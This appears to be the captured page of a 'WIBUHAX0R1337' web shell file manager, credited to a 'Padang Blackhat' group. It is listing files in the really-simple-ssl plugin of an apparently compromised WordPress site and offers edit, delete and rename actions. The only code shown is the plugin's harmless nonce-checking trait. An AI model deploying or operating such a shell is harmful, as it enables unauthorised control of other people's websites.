-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
rohihbs.com
/
wp-content
/
plugins
/
really-simple-ssl
/
core
/
app
/
Traits
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
HasAllowlistControl.php
3.357KB
Edit File
Delete File
Rename
HasEncryption.php
3.873KB
Edit File
Delete File
Rename
HasNonces.php
0.487KB
Edit File
Delete File
Rename
HasViews.php
1.497KB
Edit File
Delete File
Rename
<?php declare(strict_types=1); namespace ReallySimplePlugins\RSS\Core\Traits; trait HasNonces { /** * Method for verifying the nonce * @param mixed $nonce Preferably string, not type-casted to prevent errors */ protected function verifyNonce($nonce, string $action = 'rss_core_nonce'): bool { if (is_string($nonce) === false) { return false; } return (bool) wp_verify_nonce(sanitize_text_field(wp_unslash($nonce)), $action); } }
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat